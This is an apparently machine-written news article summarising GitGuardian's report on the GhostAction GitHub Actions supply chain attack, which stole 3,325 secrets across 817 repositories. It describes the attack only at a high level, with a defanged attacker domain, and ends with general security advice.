Ethical Hacking News
GhostAction, a sophisticated supply chain attack on GitHub, has exposed 3,325 secrets across multiple platforms, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The attackers targeted several high-profile projects and compromised credentials of various companies.
The GhostAction campaign has compromised over 3,325 secrets across multiple platforms. A sophisticated supply chain attack was carried out on several high-profile projects, including FastUUID. The attack began with a malicious GitHub Actions workflow file added to the FastUUID repository. The attackers injected similar commits into at least 817 repositories, stealing secrets. At least nine npm packages and 15 PyPI packages are directly impacted by this exposure. The attack highlights the vulnerability of software supply chains to cyberattacks.
In a shocking revelation, researchers at GitGuardian have uncovered a sophisticated supply chain attack that has compromised 3,325 secrets across multiple platforms, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The GhostAction campaign, as it is now known, targeted several high-profile projects, including the popular FastUUID project, which is used in various applications to generate unique identifiers.
The attack began on September 2, 2025, when researchers first noticed unusual activity on the FastUUID repository. Upon further investigation, they discovered that a malicious GitHub Actions workflow file had been added to the repository, which triggered automatically on 'push' or manual dispatch. The workflow file was designed to read secrets from the project's GitHub Actions environment and exfiltrate them to an external domain controlled by the attackers.
Initially, it seemed like a localized incident, but as researchers dug deeper, they realized that the attack was much broader in scope. They found that similar commits had been injected across at least 817 repositories, all sending secrets to the same endpoint, located at 'bold-dhawan[.]45-139-104-115[.]plesk[.]page.' The attackers had enumerated secret names from legitimate workflows and then hardcoded them into their own workflows to steal multiple secret types.
GitGuardian quickly sprang into action, opening GitHub issues in 573 of the impacted repositories and directly notifying the security teams of GitHub, npm, and PyPI. They also reported that over a hundred GitHub repositories had already detected the compromise and reverted the malicious changes. Shortly after, the exfiltration endpoint stopped resolving.
According to GitGuardian, at least nine npm packages and 15 PyPI packages are directly impacted by this exposure, and may release malicious or trojanized versions at any time, until their maintainers revoke the leaked secrets. The attack has also affected several companies' entire SDK portfolios, with malicious workflows affecting their Python, Rust, JavaScript, and Go repositories simultaneously.
Interestingly, researchers noted that there are some practical and technical similarities with the 's1ngularity' campaign that unfolded in late August. However, they do not believe there is a direct connection between the two operations.
The GhostAction campaign highlights the vulnerability of software supply chains to cyberattacks. The fact that attackers were able to exploit compromised maintainer accounts to perform commits that added malicious workflow files underscores the need for robust security measures to protect these ecosystems.
In response to this incident, companies and organizations are advised to take immediate action to assess their own security postures and implement additional safeguards to prevent similar attacks in the future. This may include reviewing and updating existing access controls, implementing more stringent authentication protocols, and conducting regular vulnerability assessments to identify potential weaknesses.
As the cybersecurity landscape continues to evolve, it is essential for individuals, organizations, and governments to work together to develop effective strategies to mitigate these types of threats. By sharing knowledge, best practices, and intelligence, we can reduce the risk of such attacks and create a more secure digital environment for everyone.
Related Information:
https://www.ethicalhackingnews.com/articles/Hackers-Supply-Chain-Attack-Exposes-3325-Secrets-on-GitHub-ehn.shtml
https://www.bleepingcomputer.com/news/security/hackers-steal-3-325-secrets-in-ghostaction-github-supply-chain-attack/
Published: Mon Sep 8 19:06:15 2025 by llama3.2 3B Q4_K_M
